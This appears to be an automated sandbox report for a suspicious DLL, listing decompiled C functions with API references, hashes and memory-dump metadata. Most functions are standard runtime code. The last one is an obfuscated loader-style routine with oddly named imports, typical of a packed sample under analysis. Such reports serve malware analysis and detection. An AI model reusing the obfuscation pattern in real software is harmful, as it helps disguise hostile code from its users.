            • Instruction Fuzzy Hash: F391F075608B418FD328CF29C590A9ABBF1FF89304F514A2EE5AA87B51D730F805CB51
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 73%
            			E6D511F09(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
            				signed int _v8;
            				signed char _v15;
            				char _v16;
            				void _v24;
            				short _v28;
            				char _v31;
            				void _v32;
            				char _v36;
            				intOrPtr _v40;
            				void* _v44;
            				signed int _v48;
            				signed char* _v52;
            				long _v56;
            				int _v60;
            				signed int _t78;
            				signed int _t80;
            				int _t86;
            				void* _t94;
            				long _t97;
            				void _t105;
            				void* _t112;
            				signed int _t116;
            				signed int _t118;
            				signed char _t123;
            				signed char _t128;
            				intOrPtr _t129;
            				signed int _t131;
            				signed char* _t133;
            				intOrPtr* _t135;
            				signed int _t136;
            				void* _t137;
            
            				_t78 =  *0x6d55ce08; // 0xc2f81198
            				_v8 = _t78 ^ _t136;
            				_t80 = _a8;
            				_t118 = _t80 >> 6;
            				_t116 = (_t80 & 0x0000003f) * 0x30;
            				_t133 = _a12;
            				_v52 = _t133;
            				_v48 = _t118;
            				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x6d55dda0 + _t118 * 4)) + _t116 + 0x18));
            				_v40 = _a16 + _t133;
            				_t86 = GetConsoleCP();
            				_t135 = _a4;
            				_v60 = _t86;
            				 *_t135 = 0;
            				 *((intOrPtr*)(_t135 + 4)) = 0;
            				 *((intOrPtr*)(_t135 + 8)) = 0;
            				while(_t133 < _v40) {
            					_v28 = 0;
            					_v31 =  *_t133;
            					_t129 =  *((intOrPtr*)(0x6d55dda0 + _v48 * 4));
            					_t123 =  *(_t129 + _t116 + 0x2d);
            					if((_t123 & 0x00000004) == 0) {
            						if(( *(E6D50ED85(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
            							_push(1);
            							_push(_t133);
            							goto L8;
            						} else {
            							if(_t133 >= _v40) {
            								_t131 = _v48;
            								 *((char*)( *((intOrPtr*)(0x6d55dda0 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
            								 *( *((intOrPtr*)(0x6d55dda0 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x6d55dda0 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
            								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
            							} else {
            								_t112 = E6D50E99B( &_v28, _t133, 2);
            								_t137 = _t137 + 0xc;
            								if(_t112 != 0xffffffff) {
            									_t133 =  &(_t133[1]);
            									goto L9;
            								}
            							}
            						}
            					} else {
            						_t128 = _t123 & 0x000000fb;
            						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
            						_push(2);
            						_v15 = _t128;
            						 *(_t129 + _t116 + 0x2d) = _t128;
            						_push( &_v16);
            						L8:
            						_push( &_v28);
            						_t94 = E6D50E99B();
            						_t137 = _t137 + 0xc;
            						if(_t94 != 0xffffffff) {
            							L9:
            							_t133 =  &(_t133[1]);
            							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
            							_v56 = _t97;
            							if(_t97 != 0) {
            								_t45 =  &_v36; // 0x6d51267e
            								if(WriteFile(_v44,  &_v24, _t97, _t45, 0) == 0) {
            									L19:
            									 *_t135 = GetLastError();
            								} else {
            									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
            									if(_v36 >= _v56) {
            										if(_v31 != 0xa) {
            											goto L16;
            										} else {
            											_t105 = 0xd;
            											_v32 = _t105;
            											_t55 =  &_v36; // 0x6d51267e
            											if(WriteFile(_v44,  &_v32, 1, _t55, 0) == 0) {
            												goto L19;
            											} else {
            												if(_v36 >= 1) {
            													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
            													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
            													goto L16;
            												}
            											}
            										}
            									}
            								}
            							}
            						}
            					}
            					goto L20;
            					L16:
            				}
            				L20:
            				return E6D508B95(_v8 ^ _t136);
            			}



































            APIs
            • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,6D51267E,?,00000000,?,00000000,00000000), ref: 6D511F4B
            • __fassign.LIBCMT ref: 6D511FC6
            • __fassign.LIBCMT ref: 6D511FE1
            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 6D512007
            • WriteFile.KERNEL32(?,?,00000000,~&Qm,00000000,?,?,?,?,?,?,?,?,?,6D51267E,?), ref: 6D512026
            • WriteFile.KERNEL32(?,?,00000001,~&Qm,00000000,?,?,?,?,?,?,?,?,?,6D51267E,?), ref: 6D51205F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
            • String ID: ~&Qm
            • API String ID: 1324828854-113722129
            • Opcode ID: d4845c0a456978ea7ea6089f9d682ae35a49d87698851b4c49001b95ca3c67e6
            • Instruction ID: d7b25c9e6f02fbe85c1eca361fb5f7fe47f5f04b362a4a26146407471368acc6
            • Opcode Fuzzy Hash: d4845c0a456978ea7ea6089f9d682ae35a49d87698851b4c49001b95ca3c67e6
            • Instruction Fuzzy Hash: AC51E275A0420A9FEF14CFA8CC85BEEBBF8EF4A300F15455AE951E7681E7309940CB60
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 69%
            			E6D510500(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
            				signed int _v8;
            				int _v12;
            				void* _v24;
            				signed int _t49;
            				signed int _t54;
            				int _t58;
            				signed int _t60;
            				short* _t62;
            				signed int _t66;
            				short* _t70;
            				int _t71;
            				int _t78;
            				short* _t81;
            				signed int _t87;
            				signed int _t90;
            				void* _t95;
            				void* _t96;
            				int _t98;
            				short* _t101;
            				int _t103;
            				signed int _t106;
            				short* _t107;
            				void* _t110;
            
            				_push(__ecx);
            				_push(__ecx);
            				_t49 =  *0x6d55ce08; // 0xc2f81198
            				_v8 = _t49 ^ _t106;
            				_push(__esi);
            				_t103 = _a20;
            				if(_t103 > 0) {
            					_t78 = E6D511DB8(_a16, _t103);
            					_t110 = _t78 - _t103;
            					_t4 = _t78 + 1; // 0x1
            					_t103 = _t4;
            					if(_t110 >= 0) {
            						_t103 = _t78;
            					}
            				}
            				_t98 = _a32;
            				if(_t98 == 0) {
            					_t98 =  *( *_a4 + 8);
            					_a32 = _t98;
            				}
            				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
            				_v12 = _t54;
            				if(_t54 == 0) {
            					L38:
            					return E6D508B95(_v8 ^ _t106);
            				} else {
            					_t95 = _t54 + _t54;
            					_t85 = _t95 + 8;
            					asm("sbb eax, eax");
            					if((_t95 + 0x00000008 & _t54) == 0) {
            						_t81 = 0;
            						__eflags = 0;
            						L14:
            						if(_t81 == 0) {
            							L36:
            							_t105 = 0;
            							L37:
            							E6D5104E0(_t81);
            							goto L38;
            						}
            						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
            						_t121 = _t58;
            						if(_t58 == 0) {
            							goto L36;
            						}
            						_t100 = _v12;
            						_t60 = E6D50CD05(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
            						_t105 = _t60;
            						if(_t105 == 0) {
            							goto L36;
            						}
            						if((_a12 & 0x00000400) == 0) {
            							_t96 = _t105 + _t105;
            							_t87 = _t96 + 8;
            							__eflags = _t96 - _t87;
            							asm("sbb eax, eax");
            							__eflags = _t87 & _t60;
            							if((_t87 & _t60) == 0) {
            								_t101 = 0;
            								__eflags = 0;
            								L30:
            								__eflags = _t101;
            								if(__eflags == 0) {
            									L35:
            									E6D5104E0(_t101);
            									goto L36;
            								}
            								_t62 = E6D50CD05(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
            								__eflags = _t62;
            								if(_t62 == 0) {
            									goto L35;
            								}
            								_push(0);
            								_push(0);
            								__eflags = _a28;
            								if(_a28 != 0) {
            									_push(_a28);
            									_push(_a24);
            								} else {
            									_push(0);
            									_push(0);
            								}
            								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
            								__eflags = _t105;
            								if(_t105 != 0) {
            									E6D5104E0(_t101);
            									goto L37;
            								} else {
            									goto L35;
            								}
            							}
            							_t90 = _t96 + 8;
            							__eflags = _t96 - _t90;
            							asm("sbb eax, eax");
            							_t66 = _t60 & _t90;
            							_t87 = _t96 + 8;
            							__eflags = _t66 - 0x400;
            							if(_t66 > 0x400) {
            								__eflags = _t96 - _t87;
            								asm("sbb eax, eax");
            								_t101 = E6D50B438(_t87, _t66 & _t87);
            								_pop(_t87);
            								__eflags = _t101;
            								if(_t101 == 0) {
            									goto L35;
            								}
            								 *_t101 = 0xdddd;
            								L28:
            								_t101 =  &(_t101[4]);
            								goto L30;
            							}
            							__eflags = _t96 - _t87;
            							asm("sbb eax, eax");
            							E6D513490();
            							_t101 = _t107;
            							__eflags = _t101;
            							if(_t101 == 0) {
            								goto L35;
            							}
            							 *_t101 = 0xcccc;
            							goto L28;
            						}
            						_t70 = _a28;
            						if(_t70 == 0) {
            							goto L37;
            						}
            						_t125 = _t105 - _t70;
            						if(_t105 > _t70) {
            							goto L36;
            						}
            						_t71 = E6D50CD05(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
            						_t105 = _t71;
            						if(_t71 != 0) {
            							goto L37;
            						}
            						goto L36;
            					}
            					asm("sbb eax, eax");
            					_t72 = _t54 & _t95 + 0x00000008;
            					_t85 = _t95 + 8;
            					if((_t54 & _t95 + 0x00000008) > 0x400) {
            						__eflags = _t95 - _t85;
            						asm("sbb eax, eax");
            						_t81 = E6D50B438(_t85, _t72 & _t85);
            						_pop(_t85);
            						__eflags = _t81;
            						if(__eflags == 0) {
            							goto L36;
            						}
            						 *_t81 = 0xdddd;
            						L12:
            						_t81 =  &(_t81[4]);
            						goto L14;
            					}
            					asm("sbb eax, eax");
            					E6D513490();
            					_t81 = _t107;
            					if(_t81 == 0) {
            						goto L36;
            					}
            					 *_t81 = 0xcccc;
            					goto L12;
            				}
            			}



























            APIs
            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,6D50DAF1,00000000,?,?,?,6D510751,?,?,00000100), ref: 6D51055A
            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,6D510751,?,?,00000100,5EFC4D8B,?,?), ref: 6D5105E0
            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 6D5106DA
            • __freea.LIBCMT ref: 6D5106E7
              • Part of subcall function 6D50B438: HeapAlloc.KERNEL32(00000000,00000001,00000004,?,6D5107B0,00000001,00000000,?,6D50E12F,00000001,00000004,00000000,00000001,?,?,6D50B13D), ref: 6D50B46A
            • __freea.LIBCMT ref: 6D5106F0
            • __freea.LIBCMT ref: 6D510715
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: ByteCharMultiWide__freea$AllocHeap
            • String ID:
            • API String ID: 3147120248-0
            • Opcode ID: f43acc1688a6faeb2c7c526abb56c143bdea0ccb07cc61f1cdedbf56f64febdb
            • Instruction ID: 562003cd55f713cf21eebfd6a6bb7fc1f8e39c98c76786d4e0855021e6c5d8ef
            • Opcode Fuzzy Hash: f43acc1688a6faeb2c7c526abb56c143bdea0ccb07cc61f1cdedbf56f64febdb
            • Instruction Fuzzy Hash: 25510972608217AFFB198E69CC81FBF37A9EF85754F124A2AFD24D6540DB34DCA08650
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 95%
            			E6D509791(void* __ecx, void* __edx) {
            				void* _t4;
            				void* _t11;
            				void* _t16;
            				long _t26;
            				void* _t29;
            
            				if( *0x6d55ce10 != 0xffffffff) {
            					_t26 = GetLastError();
            					_t11 = E6D509A8E(__eflags,  *0x6d55ce10);
            					__eflags = _t11 - 0xffffffff;
            					if(_t11 == 0xffffffff) {
            						L5:
            						_t11 = 0;
            					} else {
            						__eflags = _t11;
            						if(__eflags == 0) {
            							_t4 = E6D509AC8(__eflags,  *0x6d55ce10, 0xffffffff);
            							_pop(_t16);
            							__eflags = _t4;
            							if(_t4 != 0) {
            								_t29 = E6D50B523(_t16, 1, 0x28);
            								__eflags = _t29;
            								if(__eflags == 0) {
            									L8:
            									_t11 = 0;
            									E6D509AC8(__eflags,  *0x6d55ce10, 0);
            								} else {
            									__eflags = E6D509AC8(__eflags,  *0x6d55ce10, _t29);
            									if(__eflags != 0) {
            										_t11 = _t29;
            										_t29 = 0;
            										__eflags = 0;
            									} else {
            										goto L8;
            									}
            								}
            								E6D50B3FE(_t29);
            							} else {
            								goto L5;
            							}
            						}
            					}
            					SetLastError(_t26);
            					return _t11;
            				} else {
            					return 0;
            				}
            			}









            APIs
            • GetLastError.KERNEL32(00000001,?,6D509584,6D5084B2,6D5080FB,?,6D50830B,?,00000001,?,?,00000001,?,6D53E618,0000000C,6D5083F4), ref: 6D50979F
            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6D5097AD
            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6D5097C6
            • SetLastError.KERNEL32(00000000,6D50830B,?,00000001,?,?,00000001,?,6D53E618,0000000C,6D5083F4,?,00000001,?), ref: 6D509818
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: ErrorLastValue___vcrt_
            • String ID:
            • API String ID: 3852720340-0
            • Opcode ID: ac17046f214cdcdbe3c46d29528898203b19126ed5159c9e716d4f8d925631ad
            • Instruction ID: 945bb50c419f9a594c87d5009da16ff5aa78d712236e7cd96445faaea6ed250b
            • Opcode Fuzzy Hash: ac17046f214cdcdbe3c46d29528898203b19126ed5159c9e716d4f8d925631ad
            • Instruction Fuzzy Hash: FE01F53210D2136EAF1F16786C857772B79EB837B872E0629E23048DD8EF524C609A80
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,6D50A65C,?,?,6D50A5FC,?,6D53E678,0000000C,6D50A72F,00000000,00000000), ref: 6D50A6CB
            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6D50A6DE
            • FreeLibrary.KERNEL32(00000000,?,?,?,6D50A65C,?,?,6D50A5FC,?,6D53E678,0000000C,6D50A72F,00000000,00000000,00000001,6D508275), ref: 6D50A701
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: AddressFreeHandleLibraryModuleProc
            • String ID: CorExitProcess$mscoree.dll
            • API String ID: 4061214504-1276376045
            • Opcode ID: 7dc49902eb13282a37b9fb3a5ef3dcc694164543e200050a75a590d1e1ffc866
            • Instruction ID: 2107d41b333920de5aa8509b588315326755455225463b455f804226b95c24df
            • Opcode Fuzzy Hash: 7dc49902eb13282a37b9fb3a5ef3dcc694164543e200050a75a590d1e1ffc866
            • Instruction Fuzzy Hash: 1FF06271900219BBCF09AF90CC49FBD7FB5EF06352F024064F825A2A50DF719A80CB91
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 46%
            			E6D50768E() {
            				intOrPtr _t198;
            				signed int _t205;
            				intOrPtr _t206;
            				signed int _t219;
            				struct _CRITICAL_SECTION* _t226;
            				signed int _t238;
            				intOrPtr _t244;
            				void* _t251;
            				signed int _t276;
            				signed int _t280;
            				void* _t284;
            				intOrPtr _t300;
            				signed int _t301;
            				signed int _t305;
            				intOrPtr _t307;
            				signed int _t317;
            				signed int _t318;
            				signed int _t322;
            				signed int _t329;
            				void* _t331;
            				intOrPtr _t332;
            				intOrPtr _t334;
            				intOrPtr _t335;
            				signed int _t336;
            				signed int _t341;
            				void* _t350;
            				signed int _t351;
            				intOrPtr _t353;
            				void* _t355;
            				intOrPtr _t357;
            				signed int* _t358;
            				intOrPtr _t363;
            				signed int _t365;
            				void* _t371;
            				void* _t372;
            				void* _t373;
            
            				_t307 =  *((intOrPtr*)(_t371 + 0x54));
            				_t357 =  *((intOrPtr*)(_t371 + 0x68));
            				 *((intOrPtr*)(_t371 + 0xc)) = _t307 + 0x41e;
            				_t363 =  *((intOrPtr*)(_t371 + 0x54)) + 0xfffffd78;
            				_t353 =  *((intOrPtr*)(_t371 + 0x78));
            				 *((intOrPtr*)(_t371 + 0x14)) = _t307 + 0x140;
            				_t300 = _t357 + 0x6f9;
            				 *((intOrPtr*)(_t371 + 0x5c)) = _t363;
            				 *((intOrPtr*)(_t371 + 0x18)) = _t307 - 0x2872;
            				_push(_t357);
            				 *((intOrPtr*)(_t371 + 0x80)) =  *((intOrPtr*)(_t371 + 0x80)) + 0x956;
            				 *((intOrPtr*)(_t371 + 0x20)) = _t353 + 0xb56;
            				_t332 = _t353 - 0x1e7b;
            				 *((intOrPtr*)(_t371 + 0x7c)) = _t332;
            				 *((intOrPtr*)(_t371 + 0x28)) = _t307 - 0x2db;
            				 *((intOrPtr*)(_t371 + 0x70)) = _t357 - 0x69;
            				_push(_t307 + 0x32);
            				_push(_t363 + 0xfffffe4e);
            				 *((intOrPtr*)(_t371 + 0x2c)) = _t300;
            				_push(_t300 - 0x762);
            				_push( *((intOrPtr*)(_t371 + 0x78)));
            				_push(_t307 - 0x984);
            				_push(_t307 - 0x984);
            				_push(_t300 - 0xe15);
            				_push( *((intOrPtr*)(_t371 + 0x80)) + 0xfffffea1);
            				_push(_t300 - 0x547);
            				_push(_t357 + 0x52c);
            				_push(_t307);
            				_push(_t357 - 0xea);
            				_push(_t332 + 0x28a4);
            				_t365 = E6D515588();
            				_t198 =  *((intOrPtr*)(_t371 + 0x98));
            				_t334 =  *((intOrPtr*)(_t371 + 0x50)) + 0x1e7b;
            				 *((intOrPtr*)(_t371 + 0x8c)) = _t334;
            				_push(_t198 - 0x3c4);
            				_push(_t300 - 0xda2);
            				_push(_t334);
            				_push( *((intOrPtr*)(_t371 + 0xbc)) + 0x269);
            				_push(_t357);
            				_push(_t198 + 0xe2);
            				_t41 = _t365 - 0x1b2; // -434
            				_push( *((intOrPtr*)(_t371 + 0xb0)) + 0x42f);
            				_t358 =  *(_t371 + 0xc0);
            				_push(_t357 + 0x43a);
            				_push(_t300 - 0x1dd);
            				_push(_t358);
            				_t205 = E6D51450E();
            				_t335 =  *((intOrPtr*)(_t371 + 0x78));
            				_t301 = _t205;
            				_t206 =  *((intOrPtr*)(_t371 + 0xd0));
            				_t372 = _t371 + 0x64;
            				_push(_t206 + 0x977);
            				_push(_t206 + 0x344);
            				_push(_t335 - 0x7c9);
            				_t52 = _t301 + 0x71c; // 0x71c
            				_push(_t358);
            				_push( *((intOrPtr*)(_t372 + 0x64)) + 0x1a7);
            				_push( *((intOrPtr*)(_t372 + 0x7c)));
            				_push(_t353 - 0x88);
            				_push(_t335 + 0x111);
            				_push(_t353 + 0x632);
            				_push( *((intOrPtr*)(_t372 + 0x38)) + 0xfffff89e);
            				_t58 = _t365 - 0x21b; // -539
            				_push( *((intOrPtr*)(_t372 + 0x8c)) + 0x75c);
            				_t60 = _t365 - 0x560; // -1376
            				_t61 = _t365 + 0x129; // 0x129
            				_t219 = E6D513E64();
            				_t373 = _t372 + 0x3c;
            				 *(_t373 + 0x28) = _t219;
            				if(_t301 == _t353) {
            					_t336 =  *(_t373 + 0x24);
            					if(_t301 < _t336 + 0x90e) {
            						_t65 = _t301 + 0xcfd; // 0xcfd
            						_t355 = _t65;
            						if( *(_t373 + 0x14) == _t355) {
            							_t317 = _t358[0x52];
            							 *(_t373 + 0x64) = _t317;
            							_t358[0xa] = (_t358[0x2f] & _t336 & _t301) * _t358[0xa];
            							_t226 =  *(_t373 + 0x7c) | 0x00002ac3;
            							 *(_t373 + 0x50) = _t226;
            							if(_t317 > _t226) {
            								_t318 =  *(_t373 + 0x20);
            								 *(_t373 + 0x28) = _t301 ^  *(_t373 + 0x1c);
            								 *(_t373 + 0x24) = _t336 ^ 0x00001df3;
            								 *(_t373 + 0x14) = _t301 * 0x00001e7b ^ 0x00002597;
            								_t106 = _t365 - 0x2ea5; // -11941
            								 *(_t373 + 0x30) = _t106 * _t318;
            								 *(_t373 + 0x34) = _t318 | _t336 |  *(_t373 + 0x1c);
            								_t238 =  *(_t373 + 0x78);
            								 *(_t373 + 0x38) = _t238 & _t301;
            								 *(_t373 + 0x3c) = _t365 * 0x29b2;
            								 *((intOrPtr*)(_t373 + 0x40)) = _t238 + _t365;
            								_t341 =  *_t358;
            								 *((intOrPtr*)(_t373 + 0x48)) = (_t238 & _t318) + 0x252e;
            								 *(_t373 + 0x44) = _t365 ^ _t318 | 0x00002ac3;
            								 *(_t373 + 0x4c) =  *(_t373 + 0x18) |  *(_t373 + 0x10) | 0x00002749;
            								do {
            									_t244 =  *((intOrPtr*)(_t373 + 0x68));
            									 *(_t373 + 0x2c) = _t341 &  *(_t373 + 0x28);
            									_push( *(_t244 + 0xe4) *  *(_t244 + 0xe4) - 0x1e7b);
            									_push( *(_t244 + 0x124) ^  *(_t244 + 8) | 0x00001eee);
            									_push(( *(_t244 + 0x1a8) |  *(_t244 + 8)) +  *((intOrPtr*)(_t373 + 0x5c)));
            									_push( *(_t373 + 0x64) * 0x1df3 -  *(_t373 + 0x1c));
            									_push( *(_t373 + 0x78));
            									_push(_t358[0x22] - 0x000021e9 ^ 0x00002c90);
            									_push( *(_t373 + 0x3c));
            									_push(_t358[0x46] * 0x2b78);
            									_t251 = E6D5143A4(_t358[0x75] + _t318 & 0x00001eee,  *((intOrPtr*)(_t373 + 0x40)),  *(_t373 + 0x38), _t358[0x3a] & _t358[0x1a] & 0x00001df3);
            									_t358 =  *(_t373 + 0x98);
            									_t305 =  *(_t373 + 0xa8);
            									_t322 = _t358[2];
            									_push(_t322 |  *(_t373 + 0xac));
            									_push( *(_t373 + 0x64));
            									_push(_t358[0x3e] + _t305);
            									_push( *((intOrPtr*)(_t373 + 0x70)));
            									_push(_t358[0x4f] *  *(_t373 + 0xac) ^ _t358[0x17]);
            									_push( *(_t373 + 0x7c));
            									_push(_t305 - _t358[0x34]);
            									_push( *((intOrPtr*)(_t373 + 0x88)));
            									_push(_t358[0x24] & _t358[0x49]);
            									_push( *((intOrPtr*)(_t373 + 0x6c)) - _t358[0x75]);
            									_push( *(_t373 + 0x98));
            									_push(_t358[0x1d] - _t305 | _t358[0xa]);
            									_push(_t358);
            									_push( *(_t373 + 0xa8));
            									_push(_t322 -  *((intOrPtr*)(_t373 + 0x94)));
            									_push( *(_t373 + 0xac) - _t251 - 0x21e9);
            									E6D51A07D();
            									_t373 = _t373 + 0x70;
            									_push( *((intOrPtr*)(_t373 + 0x48)));
            									LeaveCriticalSection( *(_t373 + 0x50));
            									_t341 =  *_t358;
            									_t358[0xf] = _t358[0xf] | (_t341 ^ 0x00001df3) +  *(_t373 + 0x18);
            									if( *(_t373 + 0x10) <= ((_t358[0x4f] ^ _t305) & _t358[4])) {
            										 *(_t373 + 0x60) =  *(_t373 + 0x60) | _t358[0x1d] |  *(_t373 + 0x1c);
            									}
            									_t318 =  *(_t373 + 0x20);
            									_t276 =  *(_t373 + 0x64) + 2;
            									 *(_t373 + 0x64) = _t276;
            								} while (_t276 >  *(_t373 + 0x50));
            							}
            						} else {
            							_t358[0x23] = _t358[0x7c];
            							_t358[0x2f] = _t358[0x2f] - (_t358[0x4c] ^ 0x000024ad);
            							_t280 = _t358[2];
            							_t350 =  *((intOrPtr*)(_t280 + 0x4c)) - 0x424;
            							while(_t350 <  *((intOrPtr*)(_t280 + 0x1c)) - 0x424) {
            								_t350 = _t350 + 1;
            								 *((intOrPtr*)(_t358[0x14] + 0xbc)) = _t358[0x24] - 0x252e;
            								_t280 = _t358[2];
            							}
            							_t351 =  *(_t373 + 0x28);
            							_t284 = 0xffffff98;
            							 *((intOrPtr*)(_t358[0x1d] + 0x28)) =  *((intOrPtr*)(_t358[0x1d] + 0x28)) + _t284 - _t358;
            							_t329 =  *(_t373 + 0x64);
            							_push(_t355);
            							_push(_t351 - 0x4b6);
            							_push( *(_t373 + 0x1c) + 0xfffffc5b);
            							_t86 = _t365 + 0x37a; // 0x37a
            							_push(_t329);
            							_push(_t329 - 0x9f7);
            							_push(_t329);
            							_t89 = _t365 + 0x129; // 0x129
            							_t331 =  *(_t373 + 0x78) + 0xfffffe4e;
            							_push( &(( *(_t373 + 0x98))[0xa74]));
            							_push(_t351 - 0x52c);
            							_push(_t331);
            							_push( *((intOrPtr*)(_t373 + 0xa4)) + 0x36a);
            							_push(_t331);
            							_push(_t358);
            							_push( *((intOrPtr*)(_t373 + 0x90)) + 0xfffffb5d);
            							E6D5029E2();
            							_t373 = _t373 + 0x3c;
            						}
            					}
            				}
            				return  *((intOrPtr*)(_t373 + 0x54));
            			}







































            APIs
            • SNifCw242OCD._RSR(?,?,?,?,?,-FFFFF54B,?,?,?,?,?,?,?), ref: 6D50775D
            • Mqae01id._RSR(?,?,?,?,-000001B2,?,?,?,?,?,?,?,?,?,?,?), ref: 6D5077CA
            • LeaveCriticalSection.KERNEL32(?,?), ref: 6D507B4E
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: CriticalCw242LeaveMqae01idSection
            • String ID: V
            • API String ID: 1039995855-3571732617
            • Opcode ID: 03a1104c5bd03d2d4055a77696c54d7c90657510467734026d2d4be7f235ba05
